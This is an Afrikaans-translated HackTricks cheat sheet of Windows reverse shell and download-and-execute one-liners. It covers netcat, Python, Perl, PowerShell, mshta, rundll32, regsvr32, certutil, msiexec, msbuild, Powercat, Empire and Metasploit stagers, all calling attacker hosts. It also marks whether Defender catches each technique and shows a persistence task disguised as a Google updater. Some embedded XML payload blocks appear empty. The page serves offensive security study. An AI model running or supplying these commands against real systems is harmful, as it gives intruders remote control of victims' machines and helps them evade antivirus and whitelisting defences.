# Shells - Windows {{#include ../../banners/hacktricks-training.md}} ## Lolbas Die bladsy [lolbas-project.github.io](https://lolbas-project.github.io/) is vir Windows soos [https://gtfobins.github.io/](https://gtfobins.github.io/) is vir linux.\ Natuurlik is **there aren't SUID files or sudo privileges in Windows**, maar dit is nuttig om te weet **how** sommige **binaries** misbruik kan word om sekere onverwagte aksies uit te voer soos **execute arbitrary code.** ## NC ```bash nc.exe -e cmd.exe ``` ## NCAT slagoffer ``` ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" #Encryption to bypass firewall ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" ``` aanvaller ``` ncat -l #Encryption to bypass firewall ncat -l --ssl ``` ## SBD **[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk enkripsie, programuitvoering, aanpasbare bronpoorte en deurlopende herverbinding bied sbd 'n veelsydige oplossing vir TCP/IP-kommunikasie. Vir Windows-gebruikers kan die sbd.exe-weergawe van die Kali Linux-distributie as 'n betroubare vervanging vir Netcat gebruik word. ```bash # Victims machine sbd -l -p 4444 -e bash -v -n listening on port 4444 # Atackers sbd 10.10.10.10 4444 id uid=0(root) gid=0(root) groups=0(root) ``` ## Python ```bash #Windows C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" ``` ## Perl ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` ## Ruby ```bash #Windows ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` ## Lua ```bash lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ## OpenSSH Attacker (Kali) ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` Slagoffer ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : ``` ## Powershell ```bash powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile ``` Proses wat netwerkoproep uitvoer: **powershell.exe**\ Payload geskryf op skyf: **NEE** (_ten minste nêrens wat ek kon vind deur procmon nie !_) ```bash powershell -exec bypass -f \\webdavserver\folder\payload.ps1 ``` Proses wat 'n netwerkoproep maak: **svchost.exe**\ Payload op skyf geskryf: **WebDAV client local cache** **Eenreël:** ```bash $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` **Kry meer inligting oor verskillende Powershell Shells aan die einde van hierdie dokument** ## Mshta - [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) ``` ```bash mshta http://webserver/payload.hta ``` ```bash mshta \\webdavserver\folder\payload.hta ``` #### **Voorbeeld van hta-psh reverse shell (gebruik hta om 'n PS backdoor af te laai en uit te voer)** ```xml ``` **Jy kan 'n Koadic zombie baie maklik download & execute met die stager hta** #### hta voorbeeld [**Vanaf hier**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) ```xml ``` #### **mshta - sct** [**Vanaf hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml ``` #### **Mshta - Metasploit** ```bash use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit ``` ```bash Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit ``` **Gedetecteer deur Defender** ## **Rundll32** [**Dll hello world example**](https://github.com/carterjones/hello-world-dll) - [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash rundll32 \\webdavserver\folder\payload.dll,entrypoint ``` ```bash rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); ``` **Gedetecteer deur Defender** **Rundll32 - sct** [**Vanaf hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml ``` #### **Rundll32 - Metasploit** ```bash use windows/smb/smb_delivery run #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 ``` **Rundll32 - Koadic** ```bash use stager/js/rundll32_js set SRVHOST 192.168.1.107 set ENDPOINT sales run #Koadic will tell you what you need to execute inside the victim, it will be something like: rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); ``` ## Regsvr32 - [Vanaf hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll ``` ``` regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll ``` **Waargeneem deur verdediger** #### Regsvr32 – arbitrêre DLL-export met die /i-argument (toegangsbeheer en persistentie) Behalwe dat dit remote scriptlets (`scrobj.dll`) laai, sal `regsvr32.exe` 'n plaaslike DLL laai en sy `DllRegisterServer`/`DllUnregisterServer` exports aanroep. Aangepaste loaders misbruik dit gereeld om arbitrêre kode uit te voer terwyl hulle by 'n ondertekende LOLBin inpas. Twee tradecraft-aantekeninge wat in die veld waargeneem is: - Gatekeeping-argument: die DLL sluit tensy 'n spesifieke skakelaar via `/i:` deurgegee word, bv. `/i:--type=renderer` om Chromium renderer-kindprosesse na te boots. Dit verminder per ongeluk uitvoering en frustreer sandkaste. - Persistensie: skeduleer `regsvr32` om die DLL te laat loop met stille en hoë voorregte en die vereiste `/i`-argument, terwyl dit voordoen as 'n updater-taak: ```powershell Register-ScheduledTask \ -Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\.dll\"") \ -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \ -TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \ -TaskPath '\\GoogleSystem\\GoogleUpdater' \ -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \ -RunLevel Highest ``` Sien ook: ClickFix clipboard‑to‑PowerShell variant wat 'n JS-loader laai en later met `regsvr32` persistensie bewerkstellig. {{#ref}} ../../generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md {{#endref}} [**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) ```html ``` #### **Regsvr32 - Metasploit** ```bash use multi/script/web_delivery set target 3 set payload windows/meterpreter/reverse/tcp set lhost 10.2.0.5 run #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll ``` **Jy kan 'n Koadic zombie baie maklik aflaai en uitvoer met die stager regsvr** ## Certutil - [Vanaf hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) Laai 'n B64dll af, dekodeer dit en voer dit uit. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` Laai 'n B64exe af, dekodeer dit en voer dit uit. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe ``` **Gedetecteer deur defender** ## **Cscript/Wscript** ```bash powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" ``` **Cscript - Metasploit** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs ``` **Gevind deur defender** ## PS-Bat ```bash \\webdavserver\folder\batchfile.bat ``` Proses wat netwerkoproep uitvoer: **svchost.exe**\ Payload op skyf geskryf: **WebDAV client local cache** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat impacket-smbserver -smb2support kali `pwd` ``` ```bash \\10.8.0.3\kali\shell.bat ``` **Gevind deur defender** ## **MSIExec** Aanvaller ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi python -m SimpleHTTPServer 80 ``` Slagoffer: ``` victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi ``` **Gevind** ## **Wmic** - [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash wmic os get /format:"https://webserver/payload.xsl" ``` Voorbeeld xsl-lêer [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): ```xml ``` **Nie opgespoor** **Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager wmic** ## Msbuild - [Vanaf hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ``` cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" ``` Jy kan hierdie tegniek gebruik om Application Whitelisting en Powershell.exe-beperkings te omseil. Jy sal 'n PS shell kry.\ Laai dit net af en voer dit uit: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj ``` **Nie opgespoor** ## **CSC** Kompileer C# code op die slagoffer se masjien. ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs ``` Jy kan 'n basiese C# reverse shell hiervandaan aflaai: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) **Nie opgespoor nie** ## **Regasm/Regsvc** - [Vanaf hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll ``` **Ek het dit nog nie probeer nie** [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) ## Odbcconf - [Vanaf hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} ``` **Ek het dit nog nie probeer nie** [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) ## Powershell Shells ### PS-Nishang [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) In die **Shells**-gids is daar baie verskillende shells. Om Invoke-_PowerShellTcp.ps1_ af te laai en uit te voer, maak 'n kopie van die skrip en voeg dit aan die einde van die lêer: ``` Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 ``` Begin om die script op 'n web server te bedien en voer dit aan die slagoffer se kant uit: ``` powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" ``` Defender bespeur dit nie as kwaadwillige kode nie (nog nie, 3/04/2019). **TODO: Kontroleer ander nishang shells** ### **PS-Powercat** [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) Laai af, begin 'n webbediener, begin die listener, en voer dit op die slagoffer se kant uit: ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` Defender detecteer dit nie as kwaadwillige kode nie (nog nie, 3/04/2019). **Ander opsies wat deur powercat aangebied word:** Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... ``` Serve a cmd Shell: powercat -l -p 443 -e cmd Send a cmd Shell: powercat -c 10.1.1.1 -p 443 -e cmd Send a powershell: powercat -c 10.1.1.1 -p 443 -ep Send a powershell UDP: powercat -c 10.1.1.1 -p 443 -ep -u TCP Listener to TCP Client Relay: powercat -l -p 8000 -r tcp:10.1.1.16:443 Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: powercat -c 10.1.1.15 -p 443 -e cmd -g Start A Persistent Server That Serves a File: powercat -l -p 443 -i C:\inputfile -rep ``` ### Empire [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) Skep 'n powershell launcher, stoor dit in 'n lêer en laai dit af en voer dit uit. ``` powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` **Bespeur as kwaadwillige kode** ### MSF-Unicorn [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) Skep 'n powershell-weergawe van die metasploit backdoor met unicorn ``` python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 ``` Begin msfconsole met die geskepte resource: ``` msfconsole -r unicorn.rc ``` Begin 'n webbediener wat die _powershell_attack.txt_ lêer bedien en voer dit op die slagoffer uit: ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" ``` **Gedetecteer as kwaadwillige kode** ## Meer [PS>Attack](https://github.com/jaredhaight/PSAttack) PS console met 'n paar offensiewe PS-modules vooraf gelaai (versleuteld)\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console met 'n paar offensiewe PS-modules en proxy-detectie (IEX) ## Verwysings - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) - [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) - [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) - [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - [Check Point Research – Onder die suiwer gordyn: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/) {{#include ../../banners/hacktricks-training.md}}